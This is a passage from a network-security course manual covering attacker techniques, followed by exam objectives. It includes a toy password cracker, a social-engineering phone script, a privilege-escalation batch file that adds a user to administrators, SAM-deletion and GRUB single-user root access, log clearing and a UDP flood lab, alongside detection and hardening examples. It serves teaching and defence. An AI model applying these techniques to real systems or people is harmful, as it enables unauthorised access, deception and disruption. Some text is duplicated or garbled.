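    """Guess order mirrors the weak classes in the task: blank, the user
    name, a wordlist, digit strings, then short lowercase strings."""
    yield ""
    yield username
    yield from wordlist
    for n in range(1, max_len + 1):
        for digits in itertools.product(string.digits, repeat=n):
            yield "".join(digits)
    for n in range(1, max_len + 1):
        for letters in itertools.product(string.ascii_lowercase, repeat=n):
            yield "".join(letters)


def crack(merged_text: str, wordlist=(), max_len: int = 4) -> dict:
    """Return {user: password} for every hash that some candidate reproduces."""
    cracked = {}
    for line in merged_text.splitlines():
        user, hsh = line.split(":")[:2]
        if not hsh.startswith("$toy$"):
            continue                         # locked (!, *) or a scheme we don't handle
        salt = hsh.split("$")[2]             # salt is stored with the hash, as in crypt(3)
        for guess in candidates(user, wordlist, max_len):
            if toy_crypt(guess, salt) == hsh:
                cracked[user] = guess
                break
    return cracked


# Constructed sample files for the four test accounts (not from a real system).
PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:500:500::/home/alice:/bin/bash
bob:x:501:501::/home/bob:/bin/bash
carol:x:502:502::/home/carol:/bin/bash
dave:x:503:503::/home/dave:/bin/bash
"""
SHADOW = "\n".join([
    "root:!:12000:0:99999:7:::",                          # locked account, no hash
    "alice:" + toy_crypt("", "Xa") + ":12000:0:99999:7:::",      # blank
    "bob:" + toy_crypt("bob", "Xb") + ":12000:0:99999:7:::",     # same as user name
    "carol:" + toy_crypt("1234", "Xc") + ":12000:0:99999:7:::",  # digits only
    "dave:" + toy_crypt("dzxq", "Xd") + ":12000:0:99999:7:::",   # random letters
]) + "\n"

if __name__ == "__main__":
    merged = unshadow(PASSWD, SHADOW)
    print(merged, end="")
    print(crack(merged))
```

The merged file is as sensitive as /etc/shadow itself, which is the reason for the chmod 600 in step 12 of the task: anything that can read pwd.txt can run this loop offline, at whatever speed the hardware allows, without ever touching the login program.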

Topic 8J
Revealing Hidden Passwords

Using programs such as L0pht is not the only way of identifying passwords of users and applications on a system. Another method is to try to reveal the passwords beneath the asterisks in Windows.

Windows programs generally use the asterisks only to mask the true password, which the password field still holds in clear text. Imagine removing a tablecloth to see the surface of the table below. The passwords are there; it is only a matter of removing the covering. The tool we will use to do this is called Snadboy's Revelation. Figure 8-32 and Figure 8-33 show this tool in action. In Figure 8-32, you can see a user's password being masked by the asterisks.

Figure 8-32: Creating a user and entering a password that is hidden from view by asterisks.

In Figure 8-33, Snadboy's Revelation shows the unmasked password.

Figure 8-33: Place the crosshairs over the asterisks, and Snadboy's Revelation will reveal the password for this user.

TASK 8J-1
Revealing Hidden Passwords

Provide students with the location of the Snadboy installation files.

1. Log on to Windows 2000 as the renamed Administrator account.
2. Create a new folder on your boot partition named Snadboy.
3. Copy the Snadboy installation program from the location provided by your instructor to the new Snadboy folder.
4. If necessary, unzip the file, and extract it to the Snadboy folder.
5. Run the installation program, accepting all defaults.
6. Run Snadboy's Revelation.
7. From the Start menu, choose Programs→Accessories→Communications→Internet Connection Wizard. Specify that you want to set up an Internet connection manually, and click Next.
8. Specify that you want to connect through a LAN, and click Next three times.
9. For Display Name, enter test, and for Email Address, enter test@localhost and click Next.
10. For the POP3 and SMTP Server Names, enter localhost and click Next.
11. Leave the Account Name as displayed, enter the password 1qaz!QAZ and leave the Wizard open.
12. Move the Snadboy window to the upper-right corner of your screen.
13. Move the Wizard window to the lower-left corner of your screen.
14. Observe the Wizard window. The password for the user named test is masked by a series of asterisks.
15. Switch to the Snadboy window, and drag the target-shaped cursor over the masked password, and release the mouse button.
16. Observe the Snadboy window. The masked password is revealed.
17. Close all open windows.
13. Move the Wizard window to the lower-left corner of your screen. 14. Observe the Wizard window. The password for the user named test is masked by a series of asterisks. 15. Switch to the Snadboy window, and drag the target-shaped cursor over the masked password, and release the mouse button. 16. Observe the Snadboy window. The masked password is revealed. 17. Close all open windows.

Topic 8K
Other Attacks

Social Engineering

Social engineering takes advantage of some inherent human characteristics. Very good hackers, in general, have quite a solid grasp of human psychology. This is an absolute must for the hacker to be able to perform social engineering well. Understanding how people generally react to given predictable situations allows hackers to use this knowledge to elicit the needed responses.

Most social engineering begins with the information learned during the network-reconnaissance and target-acquisition phases of the attack. This information includes phone and fax numbers, IP addresses, physical addresses, DNS names and addresses, router names and addresses, email server names and addresses, billing contact names and email addresses, and so forth. This information provides a good social engineer with most of what is required to begin the attack.

With just the information gained from network reconnaissance, there are several different avenues open to hackers. The two primary methods are to try to take advantage of either the users of the network or the Help Desk of the network. Both methods require roughly the same set of skills from the hacker, so both are used widely. Additionally, for this to be successful, the company needs to be big enough that most employees have never heard of nor seen most of the other employees.

Let's look at the first method: trying to take advantage of the users of a network. In this scenario, the hacker may call the front desk (any user would normally work; the front desk is just one example) in the guise of being a network administrator of the network. Having learned the name of the network administrator by checking domain name registrations, the hacker calls the user as the network administrator, requesting information. Many network users will simply respond to what the network administrator wants and needs right away, because they believe that this is the person who controls their network usage. This is one of the key psychological elements that the hacker will exploit.

As the hacker walks the user through a series of questions and scenarios, they are building a relationship with the user. Soon enough, the user will give enough information to allow the hacker to simply walk into the network at will. This method is perhaps the most common social engineering technique, and it is used daily!

The other method is for the hacker to target the Help Desk for social engineering. This process usually requires a bit more acting ability and a strong personality to pull off. It also requires a decent amount of information about the corporate management of the given target. A name of a person quite high up on the corporate ladder is required: not high enough so everyone in the company instantly recognizes the name or the voice, but high enough in the structure so that people might feel fear by association of the title.

A common way to get the name of this high-level person is for the hacker to call to set up a fake meeting. The hacker calls reception, and says, "Hi, this is John from XYZ. My boss asked me to set up a meeting with your HR Director, but she was leaving the office when she asked me. What is the HR Director's name again?" You get the idea. Once the higher-up's name is known, the hacker can call the Help Desk and begin demanding something like, "My email is not working, reset my password right now, and how do I set it up again?" Instant access to the internal email server!

There are no restrictions on social engineering, which is why it is so effective. The options for a hacker to use social engineering are almost limitless; the only restriction is the overall creativity of the hacker. Perhaps a hacker takes a part-time job at a local ISP for a while to gain intelligence. The entire reason they may be there is to gain a different level of access to information about potential targets.

In any case, whether the target is a user, a Help Desk worker, or corporate clients of an ISP, the general method hackers use is the same: use the human psyche to their advantage.

TASK 8K-1
Discussing Social Engineering Examples

1. Discuss and define examples of how social engineering can be used by an attacker to gain knowledge about a potential target.

Topic 8L
Case Study: Social Engineering

Target: Good morning, XYZ Corp, how may I direct your call?

Hacker, with just a bit of authority in the voice: Good morning, actually I called to speak with you. This is Warren from the Networking Department. Who is this again, just so I'm sure I have the right person?

Target: This is John, is there something wrong?

Hacker grins in response to the question, then: No, John, not right now, but we are experiencing some intermittent problems. I just stepped out of a meeting with Kevin, and we decided we needed to ask you and a few other users a few questions. They'll be straightforward, not too technical, so don't worry. OK, ready? (Hacker uses a real employee name, gained during network reconnaissance, to help build the image.)

Target: Um, sure I guess. I'm not that great with the computer in that way. I mean I use Office really well, and stuff, but....

Hacker: You'll be fine, John. Here we go. The first thing I need you to do is open the command prompt. Go to your Run line and type command.

Hacker waits.

Target: Where do I type Run?

Hacker sighs a bit, to pressure the Target, then grins even wider.

Hacker: No, you don't type Run. You see the Start button in the lower left-hand corner? Good, click it and go up to where it says Run. See it now? OK, great. You're doing fine. OK, now type Command. Let me know when the black window opens up on your screen.

Target: OK, it's open now. Now what?

Hacker: Good, the first thing I need you to type is called Ipconfig, just type in the letters I-p-c-o-n-f-i-g, then I'll ask you a few more questions from that screen.

Target: How do you spell that again? Oh, never mind, I figured it out. OK, what do you want from this?

Hacker: Tell me what it says to the right of where it says IP Address, and where it says Subnet Mask and Default Gateway.

Hacker waits, then records Target's responses.

Hacker: OK, thanks, now I want you to type in something similar, type Ipconfig, space, forward slash all.

Target: Uh, OK I got it. This is easy!

Hacker: Yes, it is, you're doing great. Now, tell me what it says to the right of DHCP Enabled, Host Name, Primary DNS Suffix, and DNS Servers....

Hacker waits again, and records Target's response.

Target: OK, wow, that's a lot of stuff, huh?

Hacker: Yes, it can be. OK, we just have a few more. Type in nbtstat, space, minus n. Then tell me what it says to the left of the word group.

Hacker waits, then records Target's response.

Target: What is all this stuff anyway?

Hacker: These are the numbers I use to make sure you stay connected to the Internet, and that your email still functions right. By the way, have you had any email problems today?

Target: No, not really. At least I don't think so.

Hacker: That's good, I wasn't sure if your computer was one of the ones that had a problem yet or not. I'll send you something in just a minute to check your email configuration. Now one more thing to type in while you are where you are right now. Please type netstat, space, minus a. There might be a bigger list here. The column to the right, where it says State. I need you to find the ones that say listening, and tell me what is to the left, under Proto.... Yes, there could be quite a few.

Hacker records Target's response.

Target: Phew, all right is that it?

Hacker: Almost. I'm sending you an email configuration program right now.... Hang on....

Hacker pauses dramatically, then: OK, you should get it now.

Target: OK, what is this?

Hacker: Go ahead and double-click that, and tell me what the diagnostic window says when it is done.

Target: OK, hang on.... It says email server configuration OK, Client configuration OK. So, that's good right?

Hacker: That is absolutely perfect. I think you may have been one of the lucky ones today. Listen, I have something fun to send you also. Kind of a time killer, just a little fun game. Do you want that? If you don't want it, that's OK.

Target: Of course, I love those stupid games. What is it?

Hacker: It's a fun, addictive game called Whack-a-Troll. If you like it, go ahead and send it to your friends, I won't mention it to anyone. We all play it over here, so there is no reason you guys shouldn't get it, you know?

Target: Really, well thanks a lot Warren, I really have to get back to work. So, everything seems OK?

Hacker: Yep, seems all good. Have a great day!

Target: Thanks, you too. Bye.

Now, please don't laugh. Although this scenario illustrates an extreme case, it is not that far off. In this case, the hacker happened to get lucky and get someone on the other line that fit the need just right. Of course, this will not happen often, but odds are that it will happen. Think about what this hacker was able to learn, and do, in just a few short minutes.

TASK 8L-1
Reviewing the Social Engineering Case Study

1. What was this attacker able to learn during the social engineering?

   The hacker got all of the internal IP details, an internal domain name, the company DNS server addresses, and the listening ports of this computer! Then, as if that was not enough, the hacker loaded a Trojan Horse in a friendly email sent from a fake address. And, the hacker took the next step of trying to infect the network with the Trojan Horse. Again, all in a few minutes. Only a bit more work, and this attacker will end up with complete control of the entire network!

Topic 8M
Gaining Unauthorized Access

Although many of these hacker tools are effective, they may require access that the attacker cannot get from the Internet to run them. Or, perhaps the antivirus software will detect them, as may be the case for well-known programs like NetBus and SubSeven.

Remember that many people consider the number one threat to network security to be the employees themselves. If the employee has a bit of programming skill, then the threat can become even more difficult to defend against.

This section focuses on very simple programming techniques that can be a threat. Obviously, an attacker would not already have access to the machine as an administrator, but this is to show what could be programmed into an attack, which would then be sent to the administrator, in the hopes that he or she would execute it.

Privilege Escalation

Consider the following situation: On a Windows 2000 network, the user WandaB has regular user privileges. She decides that she wants to be a network administrator. Wanda creates the following simple program in Notepad, and saves it with a name such as regedit.bat.

    net localgroup administrators WandaB /add
    start regeditr.exe
    exit

Wanda then arranges (probably by some devious means) for someone who already has administrative access to place the file in the %systemroot% folder of a Windows 2000 Server, rename the original file regedit.exe as regeditr.exe, and reboot the server.

The next time that anyone with administrative privileges tries to edit the Registry of the compromised server by opening the Run dialog box and entering regedit, Wanda's batch file will run, changing her group membership to Administrators and granting her the privileges of that group. The administrator who ran Regedit will probably not be aware that he or she has done anything unusual, because Wanda's batch file calls on the renamed Registry Editor.

Files in Windows systems are executed in the following order: .com, .exe, and then .bat. This is a simple example of how a user can take advantage of knowing the basics of Windows and programming. The only restriction on how far this can go is the imagination of the user.
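From the defender's side, the arrangement above leaves a simple artifact: a script file in a system folder carrying the name of a system tool, with the real .exe renamed or gone. The check below is an added example, not code from the course; the list of tool names, the inclusion of .cmd alongside the .com/.exe/.bat order the text gives, and the directory listing it runs over are all constructed assumptions.

```python
"""Look for script files that carry the name of a known system tool, the
arrangement behind the regedit.bat example above.  Added example; the tool
names and the sample listing are constructed, not taken from the course."""
from __future__ import annotations

import os
from pathlib import PurePath

# Extensions Windows will run for a bare command name.  The course text gives
# the resolution order .com, .exe, .bat; .cmd is included as an assumption.
SCRIPT_EXTENSIONS = {".com", ".bat", ".cmd"}

# Tools that should exist only as .exe in the folder being checked (assumed list).
KNOWN_TOOLS = {"regedit", "explorer", "notepad"}


def find_shadowed_tools(filenames, known_tools=KNOWN_TOOLS):
    """For each known tool, report script files sharing its name and whether
    the real .exe is still present.  Tools entirely absent from the listing
    are skipped, so the check can be run against folders that hold only some."""
    by_stem: dict[str, set[str]] = {}
    for name in filenames:
        p = PurePath(name)
        by_stem.setdefault(p.stem.lower(), set()).add(p.suffix.lower())

    report = {}
    for tool in sorted(known_tools):
        exts = by_stem.get(tool, set())
        scripts = sorted(e for e in exts if e in SCRIPT_EXTENSIONS)
        exe_present = ".exe" in exts
        # A .com or .bat beside the tool name is suspicious even if the .exe
        # is still there (.com wins the resolution order outright); a tool
        # present only under some other extension means the .exe was moved.
        if scripts or (exts and not exe_present):
            report[tool] = {"scripts": scripts, "exe_present": exe_present}
    return report


def scan_directory(path):
    """Run the check against a real folder, e.g. os.environ['SystemRoot'] on Windows."""
    return find_shadowed_tools(os.listdir(path))


# Constructed listing reproducing the WandaB scenario: regedit.exe was renamed
# and a batch file took its name.
SAMPLE_LISTING = ["regedit.bat", "regeditr.exe", "explorer.exe", "notepad.exe", "win.ini"]

if __name__ == "__main__":
    for tool, info in find_shadowed_tools(SAMPLE_LISTING).items():
        print(tool, info)
```

On the constructed listing the report names regedit with a .bat present and no .exe. The check is a heuristic for the specific trick the text describes: it does not see the renamed copy (regeditr.exe) as such, so it is best paired with file-integrity monitoring of %systemroot% and system32, which would also catch the rename and the reboot-time file placement.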

Gaining Unauthorized Rights

Now, assume a curious user exists in your Windows NT network (remember that audits have placed over 70 percent of all network abuse on the shoulders of internal users). This user has normal user rights, but that may not be enough; he or she may want to be a local administrator for his or her own machine. If the system has not been properly patched and updated, this could be easier than you think. There is a utility called GetAdmin that can give a user administrator-level rights on a machine running Windows NT 4.0 Server, if that server does not have any Service Packs after SP 3 installed. Service Pack 4 actually fixed the security hole that allowed GetAdmin to work. The GetAdmin utility can be found at http://packetstormsecurity.org, and there are other similar utilities that can penetrate a server and assign administrative rights to ordinary users. These utilities can be found on various Web sites such as the one listed here for GetAdmin.

If students are interested, and you have a machine that has only Windows NT Server (without SP 6a) installed, you can demonstrate how GetAdmin works.

At the time of this writing, the latest Service Pack for Windows NT 4.0 was SP 6a.

Deleting or Renaming the Security Accounts Manager (SAM)

Using L0pht may work in many given situations; however, the attacker may not have access to this program, or one like it. If this is the case, and the attacker needs to gain access to a Windows NT computer, one last possible attempt is to delete the SAM. The reason this would be considered a last attempt is that it will be found quickly. This section shows how an operating system that is designed to be secure might be compromised with physical access and another operating system.

The Security Accounts Manager is responsible for maintaining all of the user names, passwords, and account properties for the machine. When a machine is freshly installed, by default it has two accounts: Guest and Administrator. As the administrator adds new users and sets passwords for the users, the information is stored in the SAM file. This is all fine until something goes wrong. What happens if the SAM cannot be found when the system boots up? The Microsoft designers thought of this, and if this situation ever occurs, the system will just create a new SAM database with the default values (Guest and Administrator, with null passwords). Good news! The server is saved, right? Well, sort of.

Windows will also create new event and log files if the old ones cannot be found.

If you need access to the system and the SAM has disappeared, the new SAM might be a good idea. However, if a malicious attacker knows about this design feature and can get physical access to the server (such as with NTFSDOS on a floppy disk), he or she could use this knowledge to his or her advantage and purposely delete the SAM, in order to gain access to the system as Administrator! Because all non-default user accounts and passwords have disappeared from the server, the proper administrators of this computer should become aware of the problem fairly quickly and take steps to correct the problem. Although the attack was successful, all the alarms should now be blaring loudly, and going back is not an option.

You may be asking, what else can be done with this technique? Similar to simply deleting the SAM, but even more effective, is to rename the SAM. If an attacker is able to gain physical access to the server, as described earlier, renames the SAM and the event (.evt) and log (.log) files, and reboots the server, he or she will be able to access an otherwise secure server. Once the exploitation is completed, if the attacker deletes the new SAM, event, and log files, restores the original (renamed) SAM, event, and log files, and reboots the server, the attack can be completed without leaving a trace of evidence that the machine was compromised. In addition, the original Administrator account is not modified in any fashion.
GRUB

For default Linux installs, there is an even easier way to gain access to the root account if you have physical access to the system. This access method is built into the operating system in the form of the GRUB Loader.

In Linux, if the attacker has local access to the computer, the job of securing the computer is much more difficult. One option the attacker may use is to simply boot to a different mode. Booting into Single User mode tells the operating system to boot into a mode where networking is disabled and software drivers are not enabled; it is designed for administrators to work on the OS itself. The console is still available though, and a user who is logged on in Single User mode has root access.

Single User mode is used to recover the operating system from system crashes, or to regain root access in the event that the root password has been changed or forgotten.

TASK 8M-1
Investigating the Single User GRUB Loader

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Restart your computer.
2. When you are prompted to choose an operating system, highlight Red Hat Linux, but do not press Enter.

   If students choose Red Hat Linux instead of just selecting it, they will need to restart the computer and try again.

3. Type e, then select the line that starts with kernel, and type e again.
4. Press Spacebar and enter single to specify single-user mode.
5. When you are returned to the screen with kernel highlighted, type b to boot the OS. Linux starts in single-user mode.
6. Enter ls -l /root and cat /etc/passwd to test the access you have in single-user mode. Browse to other directories on the hard drive. In single-user mode, you have root access, even though you did not log in as root.
7. Enter shutdown -r now to reboot the computer.
8. Log on to Windows 2000 as the renamed Administrator account.
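The task shows the weakness; the matching mitigation, as an added example that is not part of the course text, is to password-protect the GRUB menu so that editing the kernel line (the e keystroke in step 3) requires a passphrase. The fragment is in GRUB legacy grub.conf syntax, which is what the Red Hat release of the period used; the file path, device names and the hash value are placeholders.

```conf
# Before (typical default /boot/grub/grub.conf, path assumed): anyone at the
# console can press 'e' and append "single" to the kernel line, as in the task.
default=0
timeout=10
title Red Hat Linux
        root (hd0,0)
        kernel /vmlinuz ro root=/dev/hda2
        initrd /initrd.img

# After: a password directive in the global section of the menu file disables
# the entry editor ('e') and the GRUB command line ('c') until 'p' is pressed
# and the password entered.  Generate the hash with grub-md5-crypt and paste
# it here; the $1$PLACEHOLDER$... value below is not a real hash.
default=0
timeout=10
password --md5 $1$PLACEHOLDER$xxxxxxxxxxxxxxxxxxxxxx
title Red Hat Linux
        root (hd0,0)
        kernel /vmlinuz ro root=/dev/hda2
        initrd /initrd.img
```

With the password set, a normal unattended boot of the default entry is unchanged; only interactive changes at the menu prompt for the passphrase. A recovery entry that should never boot without the passphrase can additionally carry the lock directive as its first line. The protection covers GRUB only: an attacker who can boot from floppy or CD-ROM (the NTFSDOS case described for Windows NT) bypasses it entirely, so BIOS boot order and a BIOS password are the other half of the control.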

Topic 8N
Hiding Evidence of an Attack

Generally, once an attacker has been in a system, it is important that the attacker not leave any traces of the attack. Although it is close to impossible to not leave any trace at all, it is possible to make it hard to locate the attacker, or evidence of the attack.

Clearing Log and Event Files

The two common areas that an attacker will work with to hide the evidence of an attack are the log files and the audit policies. Clearing the audit files will hide much of the evidence of the attack; however, the fact that the logs are cleared should raise red flags to even inexperienced administrators. The event log does not clear itself every now and then!

Hiding Attack Files

Another way that attackers can clean up after themselves is by hiding the files that they placed on the system. For instance, think back to the example of WandaB. To cover her tracks, she could change the properties of regedit.bat so that the file is hidden. Or, she could also rename the file to hide it from the real administrators.

Topic 8O
Performing a Denial of Service

Up to this point, the tools you have been using identify possible holes in the security of a system and the vulnerabilities of hosts. If the goal is not to gain access to a host, but only to disrupt access, then Denial of Service is required. By flooding the target, it becomes useless on the network.

The concept is similar to standing on a balcony during a press conference. Imagine being surrounded by 300 people, and 290 of them are just shouting out the word "Padding!" while the other 10 people are trying to ask legitimate questions. Do you think you would be able to properly respond to the 10 legitimate questions asked of you? Do you think you would even know that the questions were being asked?

A common technique for performing a DoS is Smurf. Smurf is a tool that takes a different approach to the normal DoS routine. A DoS would normally use default pings to overwhelm a given host. To really take up the resources a given target wants to use, the attacker would have to compromise many computers, and have them all ping the target at once. The difference that Smurf provides is the ability to launch a DoS against a target with only a single computer. Smurf works by sending a ping packet to the broadcast address of a network, with a spoofed source IP address. The spoofed source IP address is that of the actual target. When the network clients respond to the ping packet, they will all be sending a reply to the spoofed address. The number of hosts involved in this attack is limited to the number of hosts that are active on the network.

DoS attacks can run via multiple protocols, such as UDP and IP. Having the option to use multiple protocols increases the chance of getting past the firewall and being undetected by the Intrusion Detection System.
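The Smurf description above has two observable halves, and each can be detected from the defender's side: on the amplifying network, an echo request addressed to the broadcast address; on the victim, a burst of echo replies from many different hosts arriving within a short window. The code below is an added example, not from the course; it runs over constructed ICMP packet summaries, and the record fields, window length and source-count threshold are assumptions.

```python
"""Spot the two observable halves of a Smurf attack in ICMP packet summaries.
Added example; the packets below are constructed, not captured traffic."""
from __future__ import annotations

import ipaddress
from collections import defaultdict
from dataclasses import dataclass

ECHO_REPLY, ECHO_REQUEST = 0, 8  # ICMP type values


@dataclass(frozen=True)
class Pkt:
    ts: float       # seconds
    src: str
    dst: str
    icmp_type: int


def broadcast_echo_requests(pkts, local_networks):
    """Echo requests addressed to the broadcast address of a local network.
    This is the packet the attacker sends; a network that drops it (no
    directed broadcasts) cannot be used as an amplifier."""
    bcast = {str(ipaddress.ip_network(n).broadcast_address) for n in local_networks}
    return [p for p in pkts if p.icmp_type == ECHO_REQUEST and p.dst in bcast]


def reply_convergence(pkts, window=1.0, min_sources=10):
    """Map destination -> peak number of distinct hosts that sent it echo
    replies within any `window` seconds.  A high count, with no matching
    outbound requests, is the victim's view of the amplified flood."""
    by_dst: dict[str, list[Pkt]] = defaultdict(list)
    for p in sorted(pkts, key=lambda q: q.ts):
        if p.icmp_type == ECHO_REPLY:
            by_dst[p.dst].append(p)
    victims = {}
    for dst, replies in by_dst.items():
        peak = 0
        for i, first in enumerate(replies):
            # distinct sources seen in the window opened by this reply
            sources = {q.src for q in replies[i:] if q.ts - first.ts <= window}
            peak = max(peak, len(sources))
        if peak >= min_sources:
            victims[dst] = peak
    return victims


def _constructed_capture():
    victim = "192.0.2.10"  # spoofed source address; the real target of the flood
    pkts = [
        # ordinary ping between two hosts: one request, one reply
        Pkt(0.00, "10.0.0.5", "10.0.0.6", ECHO_REQUEST),
        Pkt(0.01, "10.0.0.6", "10.0.0.5", ECHO_REPLY),
        # the Smurf trigger: a request to the broadcast address, "from" the victim
        Pkt(0.50, victim, "10.0.0.255", ECHO_REQUEST),
    ]
    # thirty hosts on the segment answer the broadcast, all to the victim
    for i in range(1, 31):
        pkts.append(Pkt(0.50 + i * 0.01, f"10.0.0.{i}", victim, ECHO_REPLY))
    return pkts


SAMPLE_CAPTURE = _constructed_capture()

if __name__ == "__main__":
    print(broadcast_echo_requests(SAMPLE_CAPTURE, ["10.0.0.0/24"]))
    print(reply_convergence(SAMPLE_CAPTURE))
```

On the constructed capture the first function returns the single broadcast request with the victim's address as its source, and the second reports the victim receiving replies from 30 distinct hosts; the legitimate ping pair stays below the threshold. The preventive controls sit on the amplifier side: on Cisco IOS, no ip directed-broadcast on each interface (the default since IOS 12.0), and on Linux hosts the sysctl net.ipv4.icmp_echo_ignore_broadcasts=1, plus ingress filtering so that packets with a source address from outside the network are never forwarded.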

TASK 8O-1
Flooding with Udpflood

Provide students with the location of the udpflood.exe file.

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Copy udpflood.exe from the location provided by your instructor to the root of your C drive. Unzip the file if it is zipped.
2. Open a Command Prompt, switch to the C drive, and enter udpflood to open the udpflood utility.
3. To target a machine, enter its IP address into the Destination field, and use a well-known port of your choice, such as 80.
4. Set Max Duration to 360 seconds and Max Packets to 999999.
5. Set Speed to 250 packets/second by sliding the bar all the way to the right.
6. Click Go when you are ready to start the flood. Observe the lights on the hubs/switches in class.
7. If you want to have a bigger impact on a machine, have several machines target the same host and then try to transfer a file to or from that target to another machine. If you are unable to complete this step, you will have performed a small-scale Distributed Denial of Service.
8. Close all open windows, and shut down the computer.

OOB Exploit

If a temporary DoS caused by a flood is not enough of a disruption for the attacker, that attacker might try to cause a target to reboot or otherwise crash. If that were the intent, the attack would now fall into the category of the Out Of Bounds (OOB) attack. You can cause an unpatched Windows system to hang (show the blue screen) by sending it a packet that is malformed in such a way that the TCP/IP stack of the machine doesn't know how to react, so it responds by giving us one of the much feared BSODs (Blue Screens of Death).
Summary

In this lesson, you looked at the general methodologies that a hacker might use to attack a target host. We detailed the concept of network reconnaissance and other means of gaining information about a potential target. We also investigated the issues surrounding network scanning, network sweeping, and port scanning, by using different tools and operating systems. We identified common social engineering techniques, and identified common issues regarding Trojan Horse, virus, and worm programs. Finally, we took a look into some basic programming techniques.

Lesson Review

8A Describe some of the methods that an attacker can use to identify information about a potential target.

   Responses might include newsgroup postings, email headers, Web sites, merger news, and Whois lookups.

8B What could a potential attacker learn by tracing a network?

   The internal network configuration, including router names, router configurations, and Web and email server locations.

8C What is the primary reason for sweeping a network?

   To identify the active hosts. These active hosts may then become the targets of the attacker.

8D What is the primary difference between a SYN scan and a full connect scan?

   The SYN scan does not complete the connection between the two nodes, while the full connect scan completes the three-way handshake. The full connect is more likely to be caught by any Intrusion Detection Systems present on the network.

   Why would an attacker perform stack fingerprinting on an IP address?

   To identify the operating system type and version that is running on the target. If these are identified, then the attacker can focus on specific exploits for that system.

   In addition to being able to determine which hosts are active on the target network and what ports they have open and listening, what else can nmap identify by matching TCP/IP signatures?

   The operating system running on the host.

8E Which is more of a threat to a network: a virus, a Trojan Horse, or a worm?

   It can be argued that all three are the highest threat. The virus may consume resources, such as DoS on the email system. The worm can be dangerous, since it can self-replicate through the network. The Trojan Horse can be a high threat in that if written cleverly, many people may execute it and spread it through the network. So, there is no one correct answer to this question, and if you identified this point, you are right!

8F How many ordinary, non-savvy users a day could a Web site such as Malweb trick into installing something other than a font?

   Surprisingly, many! In this topic, you performed a task that an ordinary user in a typical corporate environment is tricked into doing almost on a daily basis. The connection is initiated by the user. Malicious Web sites are a major source of concern, as firewalls are typically configured to allow the user to initiate a connection to the Internet and not vice versa. If the user then downloads malicious programs in the form of spyware embedded in ads, games, or even so-called helpful similar software, then the user's machine can be compromised.

8G True or False? Netcat can be used as a cross-platform tool.

   True.

8H Why are hardware keyboard loggers more dangerous than software loggers?

   Because they are completely independent of the operating system.

8I What file in Windows NT stores the current list of user names and passwords?

   The SAM.

   What file in Linux stores the current list of user names and passwords?

   /etc/passwd and /etc/shadow are both correct answers.

8J What is the weakness exploited by tools such as Snadboy?

   The characters as typed are echoed on screen by a mask; Snadboy simply reveals what is under the mask.

8K What is a network's primary defense against social engineering?

   Education of the users of a network is the only true defense against social engineering. Each user should be instructed on how to respond to situations similar to those described in this topic. Social engineering is one of the toughest issues a network needs to defend itself against.

8L Why are Trojan Horse programs often small, simple games?

   By using a simple game, the attacker can ensure the game will circulate the office quickly. If the game were hard or large, it would not work via email and not spread as quickly. The simple games are used specifically because they are simple.

8M What Windows NT file, if deleted or renamed, would grant access to the operating system with administrative privileges?

   The SAM file.

8N What are the two common areas an attacker will work with to hide his or her tracks?

   The log files and the audit policies.

8O How does Smurf perform a DoS?

   Smurf spoofs the source IP address with that of the intended target's IP address. Thus, all replies to ping would be directed to the target.

Exam Objectives
Introduction

The Hardening the Infrastructure exam is designed to validate the foundation skills that a security professional requires. These skills include, but are not limited to, Router Security, Operating System Security, Advanced Knowledge of the TCP suite, and Network Security Basics.

Ed
T DU PL IC

The Hardening the Infrastructure exam has 6 Domains. The percentages of each domain in the exam are dened in the following chart: Examination Domain
1.0Contingency Planning 2.0Tools and Techniques 3.0Security on the Internet and the WWW 4.0Router Security and ACLs 5.0TCP/IP Packet Structure and Security 6.0Operating System Security Total

Percentage of Exam

st

Note:Important: All percentages are approximate and subject to change at any time. The Hardening the Infrastructure exam will be updated every year to ensure that candidates knowledge remains current and updated. In the event that signicant changes are to be made at the yearly update, the Security Certied Program Web site will announce those modications.

Mapping Exam Objectives to Course Content


The following table lists the test domains and objectives for the Hardening the Infrastructure examination, and where they are covered in this course.

In

DO

ru ct

NO

5 9 11 15 25 35 100

or

Appendix A: Hardening the Infrastructure Exam Objectives

AT

Domains and Percentages

E
543

iti

on

Hardening the Infrastructure Exam Objectives

APPENDIX

HTI Test Domains and Objectives


HTI Test Domains and Objectives                                New Horizons Course Lessons and Topics

Domain 1.0: Contingency Planning (5%)
1.1 Fundamental Contingency Planning                           Lesson 6, Topic A
    Identify the Need for Contingency Planning
    Describe Environmental and Technological Disasters
    Examine the Impact of the Plan on Business
1.2 Creation of the Contingency Plan                           Lesson 6, Topic B
    Requirements of the Plan
    Goals of the Plan
    Testing the Plan
1.3 Technologies of Power                                      Lesson 6, Topic C
    Personal UPS Devices
    Server Room UPS Devices
    Full Building Generators
1.4 Backing up the Operating System                            Lesson 6, Topic D
    Backup Strategies
    Backing up Windows Systems
    Backing up Linux Systems

Domain 2.0: Tools and Techniques (9%)
2.1 Perform Network Scanning and Discovery Methods
    Network Reconnaissance                                     Lesson 8, Topic A
    Network Scanning                                           Lesson 8, Topic D
    Network Mapping                                            Lesson 8, Topic B
2.2 Describe Virii, Trojans, and Worms                         Lesson 8, Topic E
    Virus
    Trojan Horse
    Worm
2.3 Examine Social Engineering Techniques                      Lesson 8, Topics K and L
    Email Social Engineering
    Telephone Social Engineering
    Physical Social Engineering
2.4 Describe Privilege Escalation                              Lesson 8, Topic M
    Basic Programming Techniques
    Gain Unauthorized Access
2.5 Examine the Process of Keystroke Logging                   Lesson 8, Topic H
    Hardware Keystroke Logging
    Software Keystroke Logging
2.6 Examine the Concepts of DoS                                Lesson 7, Topic C; Lesson 8, Topic O
    Denial of Service
    Distributed Denial of Service
2.7 Exploiting Password Weaknesses
    Strong Password Design                                     Lesson 4, Topics B and C
    Weak Password Design                                       Lesson 4, Topics B and C
    Password Cracking Techniques                               Lesson 8, Topics I and J

Domain 3.0: Security on the Internet and the WWW (11%)
3.1 Identify and Define the Weak Points in the Structure
    of the Internet                                            Lesson 7, Topics A and B
    Tier System
    DNS
    ISPs
    NAPs
    Routers
    Denial of Service
3.2 Define Web Site Attack Techniques                          Lesson 7, Topic C
    Poor Programming
    Buffer Overflows
    Vulnerability Scanning
    IIS Vulnerabilities
    Apache Vulnerabilities
3.3 Define Attack Techniques of Web Users                      Lesson 7, Topic D
    Email Attacks
    Scripting Vulnerabilities
    File Attachments
    Cookie Misuse
